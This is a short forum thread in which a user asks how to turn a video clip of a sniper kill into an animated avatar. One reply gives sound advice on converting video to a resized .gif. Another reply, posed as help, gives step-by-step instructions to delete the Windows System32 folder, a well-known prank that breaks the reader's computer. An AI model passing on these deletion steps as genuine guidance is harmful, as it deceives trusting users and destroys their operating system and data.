how do I make them animated pictures as my icon? I want to get one of me doing a really fast sniper kill

You know how to make a .gif?

What do you mean by an icon? Do you mean creating an animated forum avatar? If creating an animated avatar is what you are referring to, you can convert any video file, such as video showing your sniper kill, into an animated .gif file, and you can downsize it using online .gif editors to the limited avatar size dimensions (you can also achieve this using Photoshop). There are many online .avi to .gif converters which allows you to create .gifs, downsize .gifs, change the speed of .gifs, etc.

> Double click your hard drive
> Double click the 'Windows' folder
> Right click 'System32'
> Left click delete
> Left click yes/ok

>Decide if your going to upload it via your own attached thing on your computer or from a url you found on some website.
